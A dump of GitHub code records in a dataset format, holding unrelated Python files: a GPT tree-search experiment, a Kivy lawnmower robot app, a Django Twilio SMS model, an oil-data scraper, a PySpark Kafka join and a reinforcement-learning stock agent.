rate.\n\t\trate.sleep()","repo_name":"OSUrobotics/ROB514","sub_path":"Shell_code_ROS/lab1/src/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
+{"seq_id":"25678811758","text":"import fire, random, os, shutil, openai, concurrent, time\nfrom utils import get_task, prompt_global, call_gpt\nimport itertools\nimport numpy as np\nimport json, traceback\n\ndef gpt(env, prompt, model=\"gpt-4-0613\", temperature=0.7, max_tokens=1000, n=1, stop=None) -> list: # for tot\n    messages = [{\"role\": \"user\", \"content\": prompt}]\n    while True:\n        try:\n            response = openai.ChatCompletion.create(\n                model=model,\n                messages=messages,\n                temperature=temperature,\n                max_tokens=max_tokens,\n                n=n,\n                request_timeout=600,\n            )\n            env.completion_tokens += response[\"usage\"][\"completion_tokens\"]\n            env.prompt_tokens += response[\"usage\"][\"prompt_tokens\"]\n            return [choice[\"message\"][\"content\"] for choice in response[\"choices\"]]\n        except Exception:\n            print(traceback.format_exc())\n            time.sleep(10)\n\ndef get_value(env, x, y, n_evaluate_sample, cache_value=True):\n    value_prompt = env.value_prompt_wrap(x, y)\n    if cache_value and value_prompt in env.value_cache:\n        return env.value_cache[value_prompt]\n    value_outputs = gpt(env, value_prompt, n=n_evaluate_sample, stop=None)\n    value = env.value_outputs_unwrap(x, y, value_outputs)\n    if cache_value:\n        env.value_cache[value_prompt] = value\n    return 
value\n\ndef get_values(env, x, ys, n_evaluate_sample, cache_value=True):\n values = []\n local_value_cache = {}\n for y in ys: # each partial output\n if y in local_value_cache: # avoid duplicate candidates\n value = 0\n else: \n value = get_value(env, x, y, n_evaluate_sample, cache_value=cache_value)\n local_value_cache[y] = value\n values.append(value)\n return values\n\ndef get_proposals(env, x, y): # for tot\n propose_prompt = env.propose_prompt_wrap(x, y)\n proposals = gpt(env, propose_prompt, n=1, stop=None)[0].split('\\n')\n return [y + _ + '\\n' for _ in proposals]\n\ndef run_an_instance(task, group, split, i, line, shot, consistency, tot_width):\n try:\n print(task, group, split, i, '['+line+']', shot, consistency, tot_width)\n env = get_task(task)\n env.shot = shot\n \n if group == 'tot':\n output_dir = f'tasks/{task}/output/{group}_{shot}shot_{consistency}cons_{tot_width}width/{split}'\n else:\n output_dir = f'tasks/{task}/output/{group}_{shot}shot_{consistency}cons/{split}'\n \n os.makedirs(output_dir, exist_ok=True)\n if group == 'tot':\n assert split == 'valid'\n if os.path.exists(f'{output_dir}/{i}.out'):\n return\n x = line\n ys = [''] # current output candidates\n infos = []\n for step in range(env.get_steps(line)):\n # generation\n new_ys = [get_proposals(env, x, y) for y in ys]\n new_ys = list(itertools.chain(*new_ys))\n print(x, new_ys)\n ids = list(range(len(new_ys)))\n # evaluation\n values = get_values(env, x, new_ys, consistency)\n print(values)\n # selection\n select_ids = sorted(ids, key=lambda x: values[x], reverse=True)[:tot_width]\n select_new_ys = [new_ys[select_id] for select_id in select_ids]\n \n infos.append({'step': step, 'x': x, 'ys': ys, 'new_ys': new_ys, 'values': values, 'select_new_ys': select_new_ys})\n ys = select_new_ys\n \n with open(f'{output_dir}/{i}.json', 'w') as f:\n json.dump(infos, f, indent=4)\n\n for T, y in enumerate(ys):\n open(f'{output_dir}/{i}_{T}.out', 'w').write(y)\n res = ys[0]\n for y in ys:\n # if env.check_conclu(x, y):\n if env.check(x, y):\n res = y\n open(f'{output_dir}/{i}.out', 'w').write(res)\n usage_prompt, usage_generate = env.prompt_tokens, env.completion_tokens\n open(f'{output_dir}/{i}.log', 'w').write(f'{usage_prompt} {usage_generate}')\n \n if group == 'cot' or group == 'nct':\n if not os.path.exists(f'{output_dir}/{i}.in'):\n open(f'{output_dir}/{i}.in', 'w').write(env.prompt_input(line))\n messages = [\n {\"role\": \"system\", \"content\": prompt_global()},\n {\"role\": \"user\", \"content\": env.prompt_input(line)},\n ]\n if group == 'cot':\n messages = messages[1:]\n if shot >= 1:\n messages = messages[:-1] + env.prompt_few_shot(group, shot) + messages[-1:]\n if not os.path.exists(f'{output_dir}/{i}.out'):\n res_list, usage_prompt, usage_generate = call_gpt(messages, consistency)\n open(f'{output_dir}/{i}.log', 'w').write(f'{usage_prompt} {usage_generate}')\n for T in range(consistency):\n open(f'{output_dir}/{i}_{T}.out', 'w').write(res_list[T])\n for T in range(consistency):\n if env.check(line, res_list[T]) or (T==consistency-1 and split=='valid'):\n shutil.copy2(f'{output_dir}/{i}_{T}.out', f'{output_dir}/{i}.out')\n break\n except:\n print(traceback.format_exc())\n\ndef run(task='GraphGame', group='nct', split='valid', shot=0, consistency=1, tot_width=5):\n data = open(f'tasks/{task}/data/{split}.txt', 'r')\n \n ex = concurrent.futures.ProcessPoolExecutor(10)\n \n for i, line in enumerate(data):\n line = line.strip('\\n')\n if len(line) < 2: continue\n ex.submit(run_an_instance, task, group, split, i, 
line, shot, consistency, tot_width)\n # run_an_instance(task, group, split, i, line, shot, consistency, tot_width)\n \n ex.shutdown(wait=True)\n \n return\n\nif __name__ == '__main__':\n fire.Fire(run)\n","repo_name":"ZheyuAqaZhang/Autonomous-Tree-search","sub_path":"GPT_Experiment/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38317806526","text":"import sys\r\nsys.path.insert(1, './utils')\r\n\r\nfrom kivy.config import Config\r\nConfig.set('kivy', 'exit_on_escape', '0')\r\nConfig.set('input', 'mouse', 'mouse,multitouch_on_demand')\r\n\r\n\r\nfrom kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.floatlayout import FloatLayout\r\nfrom kivy.core.window import Window\r\nfrom kivy.clock import Clock\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfrom kivyclasses import *\r\nfrom colortools import *\r\nfrom console import *\r\nfrom messages import *\r\nfrom sleeptools import *\r\nfrom datalink import *\r\nfrom mapping import *\r\nfrom helpfuncs import *\r\n\r\n\r\nclass MainWindow(App):\r\n def build(self):\r\n min_window = (1280, 720)\r\n Window.minimum_width, Window.minimum_height = min_window\r\n Window.size = min_window\r\n\r\n self.window = BoxLayout(orientation='vertical')\r\n\r\n white = Color(255, 255, 255)\r\n mostly_white = Color(240, 240, 240)\r\n light_gray = Color(200, 200, 200)\r\n gray = Color(178, 190, 195)\r\n leafy_green = Color(109, 163, 39)\r\n dark_green = Color(44, 74, 4)\r\n sunset_orange = Color(207, 94, 37)\r\n sunset_purple = Color(181, 66, 201)\r\n gunmetal = Color(45, 52, 54)\r\n dim_gray = Color(99, 110, 114)\r\n dark_gray = Color(70, 70, 70)\r\n\r\n header_cc = ColorComponent(gray, light_gray, POS_TOP_CENTER, POS_BOT_CENTER)\r\n headerdiv_cc = ColorComponent(sunset_orange, sunset_purple, POS_LEFT, POS_RIGHT, txtsize=3)\r\n shelf_cc = ColorComponent(dark_gray, dim_gray)\r\n vdiv_cc = ColorComponent(dim_gray, dark_gray)\r\n window_cc = ColorComponent(dim_gray, dark_gray, POS_TOP_CENTER, POS_BOT_CENTER)\r\n\r\n settings = IconButton(\r\n icon_normal=\"./assets/settings.png\",\r\n icon_pressed=\"./assets/settings_pressed.png\"\r\n )\r\n\r\n self.header = Header(\r\n size_hint=(1, 0.1),\r\n color_component=header_cc,\r\n title_image=\"./assets/title.png\",\r\n buttons=[settings]\r\n )\r\n\r\n self.header_div = Divider(\r\n size_hint=(1, 0.01),\r\n color_component=headerdiv_cc,\r\n rotate_speed=10\r\n )\r\n\r\n self.content_window = BoxLayout(orientation='horizontal')\r\n\r\n home = IconButton(\r\n icon_normal=\"./assets/home.png\",\r\n icon_pressed=\"./assets/home_pressed.png\"\r\n )\r\n\r\n console = IconButton(\r\n icon_normal=\"./assets/console.png\",\r\n icon_pressed=\"./assets/console_pressed.png\"\r\n )\r\n\r\n shelf_div1 = Divider(\r\n size_hint=(None, 0.005),\r\n color_component=headerdiv_cc\r\n )\r\n\r\n shelf_div2 = Divider(\r\n size_hint=(None, 0.005),\r\n color_component=headerdiv_cc\r\n )\r\n\r\n self.widget_shelf = WidgetShelf(\r\n [home, shelf_div1, console, shelf_div2],\r\n color_component=shelf_cc,\r\n size_hint=(0.175, 1)\r\n )\r\n\r\n self.shelf_content_div = Divider(\r\n width=10,\r\n size_hint=(None, 1),\r\n color_component=vdiv_cc\r\n )\r\n\r\n self.main_content = FloatLayout()\r\n\r\n self.console_pane = ConsolePane(\r\n size_hint=(0.5, 0.9),\r\n pos_hint={'x': 0.05},\r\n color_component=window_cc,\r\n bar_color_component=headerdiv_cc\r\n )\r\n\r\n self.settings_pane = 
SettingsPane(\r\n size_hint=(0.95, 0.95),\r\n pos_hint={'right': 1},\r\n color_component=window_cc,\r\n bar_color_component=headerdiv_cc\r\n )\r\n\r\n self.image_viewer = ImagePane(\r\n size_hint=(0.5, 1),\r\n pos_hint={'right': 1}\r\n )\r\n\r\n self.map_viewer = ImagePane(\r\n size_hint=(0.5, 1),\r\n pos_hint={'right': 0.5}\r\n )\r\n\r\n\r\n\r\n self.window.add_widget(self.header)\r\n self.window.add_widget(self.header_div)\r\n\r\n self.window.add_widget(self.content_window)\r\n\r\n self.content_window.add_widget(self.widget_shelf)\r\n self.content_window.add_widget(self.shelf_content_div)\r\n self.content_window.add_widget(self.main_content)\r\n\r\n self.main_content.add_widget(self.image_viewer)\r\n self.main_content.add_widget(self.map_viewer)\r\n self.main_content.add_widget(self.console_pane)\r\n self.main_content.add_widget(self.settings_pane)\r\n\r\n\r\n\r\n settings.set_callback(self.settings_pressed)\r\n home.set_callback(self.home_pressed)\r\n console.set_callback(self.console_pressed)\r\n\r\n\r\n Clock.schedule_interval(self._background_tasks, 1/100)\r\n Clock.schedule_interval(self._update_viewer, 1/60)\r\n self._con = Console()\r\n self._cmm = ConsoleMemoryManager(max_char_count=2**11)\r\n self._rc_mode = False\r\n\r\n self._robot_connected = False\r\n self._high_latency = False\r\n self._link = None\r\n self._link_rc_rate = Rate(25)\r\n\r\n self._img = None\r\n self._map = None\r\n self._new_img = False\r\n self._new_map = False\r\n self._colors = load_colors(\"./files/colors.txt\")\r\n\r\n return self.window\r\n\r\n def settings_pressed(self):\r\n if self.settings_pane.is_open():\r\n self.settings_pane.close()\r\n else:\r\n self.settings_pane.open()\r\n\r\n def home_pressed(self):\r\n self.console_pane.close()\r\n self.settings_pane.close()\r\n\r\n def console_pressed(self):\r\n if self.console_pane.is_open():\r\n self.console_pane.close()\r\n else:\r\n self.console_pane.open()\r\n\r\n def _connect(self, ip, port):\r\n if self._link is not None:\r\n self._link.stop()\r\n self._link = DataLink(\"client\", False, host=ip, port=port)\r\n self._link.start()\r\n\r\n def _update_viewer(self, dt):\r\n if self._new_img:\r\n self.image_viewer.set_image(self._img)\r\n self._new_img = False\r\n if self._new_map:\r\n img = map_to_image(self._map, self._colors)\r\n self.map_viewer.set_image(img)\r\n self._new_map = False\r\n\r\n def _background_tasks(self, dt):\r\n \"\"\" LINK STUFF \"\"\"\r\n self._robot_connected = self._link is not None and self._link.latency() is not float('inf')\r\n if self._robot_connected:\r\n self._high_latency = self._link.latency() > 0.5\r\n\r\n if self._robot_connected:\r\n while self._link.data_available():\r\n msg = self._link.get()['data']\r\n if msg['type'] == 'status':\r\n pass\r\n elif msg['type'] == 'image_stream':\r\n self._img = np.float32(cv2.imdecode(msg['data'], cv2.IMREAD_COLOR)) / 255\r\n self._new_img = True\r\n elif msg['type'] == 'map_stream':\r\n self._map = msg['data']\r\n self._new_map = True\r\n\r\n \"\"\" CONSOLE STUFF \"\"\"\r\n if self.console_pane.is_open() and not self._con.is_enabled():\r\n self._con.enable()\r\n elif not self.console_pane.is_open() and self._con.is_enabled():\r\n self._con.disable()\r\n\r\n if self._rc_mode and not self._con.is_rc_mode():\r\n self._rc_mode = False\r\n self.print(\"Leaving RC mode.\")\r\n\r\n if self._con.data_available():\r\n if self._con.is_rc_mode():\r\n self._rc_mode = True\r\n if self._link_rc_rate.ready():\r\n if self._robot_connected:\r\n self._link.send(rc_msg(self._con.get()))\r\n else:\r\n 
cmd = self._con.get().lower()\r\n self.buffer_print(\"\")\r\n self.print(cmd, timestamp=True)\r\n if cmd == \"\":\r\n pass\r\n elif cmd == \"rc\":\r\n self.print(\"Entering RC mode, hit [esc] (escape key) to exit.\")\r\n if not self._robot_connected:\r\n self.warn(\"Robot is not connected.\")\r\n elif self._high_latency:\r\n self.warn(f\"High latency may result in unwanted actions. Current latency: {self._link.latency(string=True)}\")\r\n\r\n self._con.set_rc_mode(True)\r\n self._link_rc_rate.set_start()\r\n elif cmd[:5] == \"send \":\r\n self.print(f\"Sending \\\"{cmd[5:]}\\\"\")\r\n if not self._robot_connected:\r\n self.warn(\"Robot is not connected.\")\r\n else:\r\n self._link.send(cmd_msg(cmd[5:]))\r\n elif cmd[:8] == \"connect \":\r\n try:\r\n parts = cmd[8:].split('@')\r\n ip = parts[0]\r\n port = int(parts[1])\r\n self.print(f\"Connecting to {ip}@{port}\")\r\n self._connect(ip, port)\r\n except (IndexError, ValueError) as e:\r\n self.warn(\"Error parsing connection command.\")\r\n elif cmd == \"ping\":\r\n if not self._robot_connected:\r\n self.warn(\"Robot is not connected.\")\r\n else:\r\n self.print(self._link.latency(string=True))\r\n elif cmd == \"clear\":\r\n self._cmm.clear()\r\n self.update_console()\r\n elif cmd == \"quit\":\r\n self.print(\"Exiting application...\")\r\n if self._robot_connected:\r\n self.warn(\"Robot is still connected. This command will not stop the robot.\")\r\n self.warn(\"To quit while connected, enter \\\"quit -f\\\"\")\r\n else:\r\n self._stop()\r\n elif cmd == \"quit -f\":\r\n self.print(\"Exiting application...\")\r\n self._stop()\r\n elif cmd == \"help\":\r\n self.buffer_print(\"\\\"rc\\\": enter remote control mode, escape to quit.\")\r\n self.buffer_print(\"\\\"send ...\\\": send a command directly to the robot.\")\r\n self.buffer_print(\"\\\"connect ...ip...@...port...\\\": connect to the robot.\")\r\n self.buffer_print(\"\\\"ping\\\": get latest robot ping.\")\r\n self.buffer_print(\"\\\"clear\\\": clear the console.\")\r\n self.print(\"\\\"quit\\\": exit the application when the robot is not connected. Use \\\"-f\\\" to force quit.\")\r\n else:\r\n self.warn(f\"Unrecognized command \\\"{cmd}\\\". 
Type \\\"help\\\" for a list of commands.\")\r\n\r\n self.console_pane.set_input_text(self._con.get_current())\r\n\r\n def buffer_print(self, text, end='\\n', timestamp=False):\r\n if type(text) is not str:\r\n text = str(text)\r\n self._cmm.print(text, end=end, timestamp=timestamp)\r\n\r\n def print(self, text, end='\\n', timestamp=False):\r\n self.buffer_print(text, end=end, timestamp=timestamp)\r\n self.update_console()\r\n\r\n def warn(self, text, end='\\n', timestamp=False):\r\n text = \"[WARN] \" + text\r\n self.print(text, end=end, timestamp=timestamp)\r\n\r\n def update_console(self):\r\n self.console_pane.set_window_text(self._cmm.get())\r\n\r\n def _stop(self):\r\n self._con.stop()\r\n if self._link is not None:\r\n self._link.stop()\r\n self.stop()\r\n\r\n\r\nif __name__ == '__main__':\r\n MainWindow().run()\r\n","repo_name":"peempeem/Lawnmower","sub_path":"src/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30763003307","text":"from django.db import models\nimport os\nfrom twilio.rest import Client\n\nclass Score(models.Model):\n result = models.PositiveIntegerField()\n\n def __str__(self):\n return str(self.result)\n def save(self,*args,**kwargs):\n if self.result <70:\n account_sid = 'XXXXXXXXXX'\n auth_token = 'XXXXXXXXX'\n client = Client(account_sid, auth_token)\n\n message = client.messages.create(\n body=f'Your score is: {self.score} ',\n from_='+xxxxxxx',\n to='+xxxxxx'\n )\n\n print(message.sid)\n return super().save(*args,**kwargs)\n \n \n","repo_name":"mzoughyy/SMS-Sender","sub_path":"scores/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32672158179","text":"from gazpacho import get, Soup\nurl = \"https://tax.alaska.gov/programs/oil/production/ans.aspx?\"\nhtml = get(url)\nsoup = Soup(html)\n\nlist = soup.find('option')[1:]\nlength = len(list)\n\n# base_url = \"https://tax.alaska.gov/programs/oil/production/ans.aspx?\"\nurls = []\n\nfor i in range(length):\n options = list[i].attrs['value']\n urls.append(url + options)\n\nlen(urls)\n\nimport pandas as pd\n\ndata = []\n\n# df = df.rename(columns = {0:'date', 1:'prudhoe', 2:'kaparuk', 3:'endicott', 4:'lisburne', 5:'alpine', 6:'ans', 7:'inventories'})\n# df.columns\n# df.reset_index()\n\nfor url in urls:\n df = pd.read_html(url)[6]\n df = df.loc[2:]\n df[1] = pd.to_numeric(df[1],errors='coerce')\n df[2] = pd.to_numeric(df[2],errors='coerce')\n df[3] = pd.to_numeric(df[3],errors='coerce')\n df[4] = pd.to_numeric(df[4],errors='coerce')\n df[5] = pd.to_numeric(df[5],errors='coerce')\n df[6] = pd.to_numeric(df[6],errors='coerce')\n df[7] = pd.to_numeric(df[7],errors='coerce')\n del df[8]\n del df[9]\n del df[10]\n del df[11]\n del df[12]\n df = df.dropna(how='any')\n df = df[df[0] != 'Average']\n df.to_csv('alaska-oil-production/akdor_oil_production.csv', mode='a', header=False, index=False)","repo_name":"dianewitt/12-web-scraping","sub_path":"alaska-oil-production/archive/scrape_akdor_oil_production.py","file_name":"scrape_akdor_oil_production.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41918091769","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import from_json, to_json, col, unbase64, base64, split, expr\nfrom 
pyspark.sql.types import StructField, StructType, StringType, BooleanType, ArrayType, DateType, FloatType\n\nredisSchema = StructType(\n [\n StructField(\"key\", StringType()),\n StructField(\"value\", StringType()),\n StructField(\"expiredType\", StringType()),\n StructField(\"expiredValue\",StringType()),\n StructField(\"existType\", StringType()),\n StructField(\"ch\", StringType()),\n StructField(\"incr\",BooleanType()),\n StructField(\"zSetEntries\", ArrayType( \\\n StructType([\n StructField(\"element\", StringType()),\\\n StructField(\"score\", StringType()) \\\n ])) \\\n )\n\n ]\n)\n\ncustomerSchema = StructType(\n [\n StructField(\"customerName\", StringType()),\n StructField(\"email\", StringType()),\n StructField(\"phone\", StringType()),\n StructField(\"birthDay\", StringType())\n ]\n)\n\nstediSchema = StructType(\n [\n StructField(\"customer\", StringType()),\n StructField(\"score\", FloatType()),\n StructField(\"riskDate\", DateType())\n ]\n)\n\nspark = SparkSession.builder.appName(\"STEDI Dashboard\").getOrCreate()\n\nspark.sparkContext.setLogLevel(\"WARN\")\n\nredisRawStream = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\", \"redis-server\") \\\n .option(\"startingOffsets\", \"earliest\") \\\n .load()\n\nredisDF = redisRawStream.selectExpr(\"cast(value as string) value\")\n\nredisStreamingDF = redisDF.withColumn(\"value\", from_json(\"value\", redisSchema)) \\\n .select(col(\"value.*\")) \\\n .createOrReplaceTempView(\"RedisSortedSet\")\n\nredisEncodedDF = spark.sql(\"select key, zSetEntries[0].element as redisEvent from RedisSortedSet\")\n\nredisDecodedDF = redisEncodedDF.withColumn(\"redisEvent\", unbase64(redisEncodedDF.redisEvent).cast(\"string\"))\n\nredisDecodedDF.withColumn(\"customer\", from_json(\"redisEvent\", customerSchema)) \\\n .select(col(\"customer.*\")) \\\n .createOrReplaceTempView(\"CustomerRecords\")\n\nemailAndBirthDayStreamingDF = spark.sql(\"select * from CustomerRecords where email is not null and birthDay is not null\")\n\nemailAndBirthYearStreamingDF = emailAndBirthDayStreamingDF.withColumn(\"birthYear\", split(emailAndBirthDayStreamingDF['birthDay'], '-').getItem(0))\n\nstediRawStream = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\", \"stedi-events\") \\\n .option(\"startingOffsets\", \"earliest\") \\\n .load()\n \nstediStream = stediRawStream.selectExpr(\"cast(value as string) value\")\n\nstediStream.withColumn(\"value\", from_json(\"value\", stediSchema)) \\\n .select(col(\"value.*\")) \\\n .createOrReplaceTempView(\"CustomerRisk\")\n\ncustomerRiskStreamingDF = spark.sql(\"select customer, score from CustomerRisk\")\n\ncustomerProfile = emailAndBirthYearStreamingDF.join(customerRiskStreamingDF, expr(\"customer = email\"))\ncustomerProfile = customerProfile.select(\"customer\", \"score\", \"email\", \"birthYear\")\n\n# Write to console\n# customerProfile.writeStream \\\n# .outputMode(\"append\") \\\n# .format(\"console\") \\\n# .start() \\\n# .awaitTermination()\n\ncustomerProfile.selectExpr(\"cast(email as string) key\", \"to_json(struct(*)) value\") \\\n .writeStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"topic\", \"stedi-graph\") \\\n .option(\"checkpointLocation\",\"/tmp/kafkacheckpoint2\")\\\n .start() \\\n 
.awaitTermination()","repo_name":"Phileodontist/Udacity","sub_path":"Streaming/STEDI-Project/workspace/sparkpykafkajoin.py","file_name":"sparkpykafkajoin.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"143645129","text":"import asyncio\nimport aiohttp\nimport async_timeout\nimport socket\nimport time\n\n\nHOSTNAME = socket.gethostname()\nversion = \"1603315443\"\nBACKPACK_LOCK_URL = f\"http://localhost:4480/v1/slot/request?hostname={HOSTNAME}×tamp={int(time.time())}&version={version}\"\nWAIT_SLOT_TIMEOUT = 10\n\nasync def gethttp_req(url):\n async with aiohttp.ClientSession() as session:\n with async_timeout.timeout(10):\n async with session.get(url) as response:\n return await response.json()\n\nloop = asyncio.get_event_loop()\n\nasync def getlock():\n while True:\n try:\n print(f\"Requesting: {BACKPACK_LOCK_URL}\")\n data = await gethttp_req(BACKPACK_LOCK_URL)\n if data[\"status\"] == \"TRY_LATER\":\n print(f\"Cannot get lock. Retrying. Answer: {data}\")\n await asyncio.sleep(WAIT_SLOT_TIMEOUT)\n continue\n break\n except Exception as e:\n print(f\"Exception reached: {e}, wait {WAIT_SLOT_TIMEOUT} secs and continue\")\n await asyncio.sleep(WAIT_SLOT_TIMEOUT)\n return data\n\ndata = loop.run_until_complete(getlock())\nloop.close()\n\nconfig = data[\"info\"][\"config\"]\nif data[\"status\"] != \"LOCK_ACQUIRED\":\n version_new = data[\"info\"][\"version\"]\n print(f\"Version changed from meta server. Worker state: {data['status']} was: {version} now: {version_new}\")\n version = version_new\nelse:\n print(f\"Looks like it new run. Version: {version}\")\n\nprint(f\"Config is {config}\")\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/general/test_wrk.py","file_name":"test_wrk.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28127855010","text":"import random\nfrom math import exp\n\nfrom agent.agent import Agent\n\n\nclass ReinforcementLearning(Agent):\n type = \"RL\"\n\n '''\n q(state, action)\n The states are:\n Each combination of owning stocks: 2 exp 10 stocks \n \n The actions are:\n 3 for each stock: buy, sell\n 10 stocks\n \n The matrix is going to be 100x30\n \n c1 v1 c2 v2 c3 v3 c4 v4 n\n s1 0 0 0 0 0 0 0 0 0\n s2 0 0 0 0 0 0 0 0 0\n s3 0 0 0 0 0 0 0 0 0\n '''\n\n def __init__(self, central_bank, initial_cash=1000, soft_max=False):\n super().__init__(central_bank, initial_cash)\n self.current_step = 0\n self.q = []\n self.discount = 0.9\n self.total = 1000000\n self.learningRate = 0.8\n self.epsilon = 0.9\n self.rand_factor = 0.05\n self.reward_modifier = 100\n self.init_q_values()\n self.original_state = 0\n self.original_action = 0\n self.dec = (self.epsilon - 0.1) / self.total\n self.soft_max = False\n\n def init_q_values(self):\n num_col = 2 * len(self.central_bank.get_all_stock())\n num_lines = 2 ** len(self.central_bank.get_all_stock())\n\n for i in range(num_lines):\n tmp = [0 for _ in range(num_col)]\n # tmp.append(0)\n self.q.append(tmp)\n\n def get_state(self):\n l = len(self.central_bank.get_all_stock())\n owned_stocks = set(self.stocks_owned.keys())\n s = \"\".join([\"0\" if i in owned_stocks else \"1\" for i in range(l)])\n return int(s, 2)\n\n def learn(self):\n u = self.reward()\n prev_q = self.get_q(self.original_state, self.original_action)\n self.epsilon = max(self.epsilon - self.dec, 0.05)\n\n '''\n Q-function update\n '''\n 
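# NOTE (editor's annotation, a sketch of the intent, not author-verified): the two lines below\n # implement the standard tabular Q-learning update\n # Q(s,a) <- Q(s,a) + lr * (r + gamma * max_a' Q(s',a') - Q(s,a)),\n # where u is the reward r, self.discount is gamma, and prev_q is the Q-value of the\n # state/action pair recorded in _decide() before the step.\n # Worked example with lr=0.8, gamma=0.9: prev_q=1.0, u=2.0, max_a' Q(s',a')=3.0 gives\n # pred_error = 2.0 + 0.9*3.0 - 1.0 = 3.7 and new_q = 1.0 + 0.8*3.7 = 3.96.\n 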
pred_error = u + self.discount * self.get_max_q(self.get_state()) - prev_q\n\n new_q = prev_q + (self.learningRate * pred_error)\n self.q[self.original_state][self.original_action] = new_q\n return\n\n def _decide(self):\n self.original_state = self.get_state()\n self.epsilon -= self.dec\n act = 0\n if random.uniform(0, 1) < self.rand_factor:\n act = self.do_random_action(self.get_available_actions())\n else:\n if self.soft_max:\n act = self.do_soft_max()\n else:\n act = self.do_e_greedy()\n self.original_action = act\n\n def get_available_actions(self):\n owned_stocks = set(self.stocks_owned.keys())\n l = len(self.central_bank.get_all_stock())\n\n buy_actions = [2 * i for i in range(l) if self.central_bank.stocks[i].price <= self.cash]\n sell_actions = [2 * i + 1 for i in range(l) if i in owned_stocks]\n\n return [*buy_actions, *sell_actions]\n\n def do_e_greedy(self):\n valid_actions = self.get_available_actions()\n if random.uniform(0, 1) < self.rand_factor:\n return self.do_random_action(valid_actions)\n state = self.get_state()\n act = self.get_max_action_q(state, valid_actions)\n self.do_action(act)\n return act\n\n def do_soft_max(self):\n valid_actions = self.get_available_actions()\n act = -1\n l = len(valid_actions)\n tmp = self.get_q(self.get_state(), valid_actions[0]) / (self.epsilon * 100.0)\n\n cumulative = [exp(tmp)]\n for i in range(1, l):\n tmp = self.get_q(self.get_state(), valid_actions[i]) / (self.epsilon * 100.0)\n cumulative.append(exp(tmp) + cumulative[i - 1])\n total = cumulative[l - 1]\n cut = random.random() * total\n for i in range(l):\n if cut <= cumulative[i]:\n act = valid_actions[i]\n break\n if act >= 0:\n self.do_action(act)\n return act\n\n def get_random_available_action(self):\n valid_actions = self.get_available_actions()\n action = valid_actions[random.randint(0, len(valid_actions) - 1)]\n return action\n\n def do_random_action(self, valid_actions):\n action = valid_actions[random.randint(0, len(valid_actions) - 1)]\n self.do_action(action)\n return action\n\n def do_action(self, action):\n #if action == len(self.q[0])-1:\n # return\n stock_id = action // 2\n if action % 2:\n # odd, means sell\n max_sell = self.how_many_can_i_sell(stock_id)\n to_sell = random.randint(0, max_sell)\n self.sell(stock_id, to_sell)\n # print(\"sell: \" + str(stock_id) + \" quantity: \" + str(to_sell))\n else:\n # even, means buy\n max_buy = self.how_many_can_i_buy(stock_id) - 1\n to_buy = random.randint(0, max_buy)\n self.buy(stock_id, to_buy)\n # print(\"buy: \" + str(stock_id) + \" quantity: \" + str(to_buy) )\n\n def reward(self):\n l = len(self.stock_history)\n current_value = self.value_history[- 1]\n pre_value = self.value_history[- 2]\n\n r = current_value - pre_value\n #print(str(r))\n\n return r\n\n def get_q(self, original_state, original_action):\n return self.q[original_state][original_action]\n\n def get_max_q(self, state):\n return max(self.q[state])\n\n def get_max_action_q(self, state, valid_actions):\n max = float(\"-inf\")\n max_i = -1\n line = self.q[state]\n for i in range(len(valid_actions)):\n q_action = line[valid_actions[i]]\n if q_action > max:\n max = q_action\n max_i = valid_actions[i]\n return max_i\n","repo_name":"carolinacarreira/Autonomous-Agents-and-Multi-Agent-Systems","sub_path":"agent/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40340707867","text":"import os\r\nimport pandas as pd\r\nfrom lib import 
process_source_folder\r\nfrom lib import plot_roc_curve,balance_data\r\n\r\nCURRENT_PATH = os.path.abspath('')\r\nTRANING_SET_PATH = os.path.join(CURRENT_PATH,\"./dataset/training\")\r\nTESTING_SET_PATH = os.path.join(CURRENT_PATH,\"./dataset/testing\")\r\nSAVED_RAW_TRANING_DATA = os.path.join(CURRENT_PATH,\"./raw_traning_data.csv\")\r\nSAVED_RAW_TESTING_DATA = os.path.join(CURRENT_PATH,\"./raw_testing_data.csv\")\r\n\r\ndef load_data():\r\n #read traning data\r\n if (os.path.exists(SAVED_RAW_TRANING_DATA)):\r\n print (f'Load traning data from saved file {SAVED_RAW_TRANING_DATA}')\r\n raw_traning_data = pd.read_csv(SAVED_RAW_TRANING_DATA)\r\n else:\r\n print (f'read training data from {TRANING_SET_PATH}')\r\n raw_traning_data = process_source_folder(TRANING_SET_PATH)\r\n raw_traning_data.to_csv(SAVED_RAW_TRANING_DATA)\r\n for topic in raw_traning_data['topic'].unique():\r\n count = len(raw_traning_data[raw_traning_data['topic']==topic])\r\n print(f'{topic}: count: {count}')\r\n\r\n #read testing data\r\n if (os.path.exists(SAVED_RAW_TESTING_DATA)):\r\n print (f'Load testing data from saved file {SAVED_RAW_TESTING_DATA}')\r\n 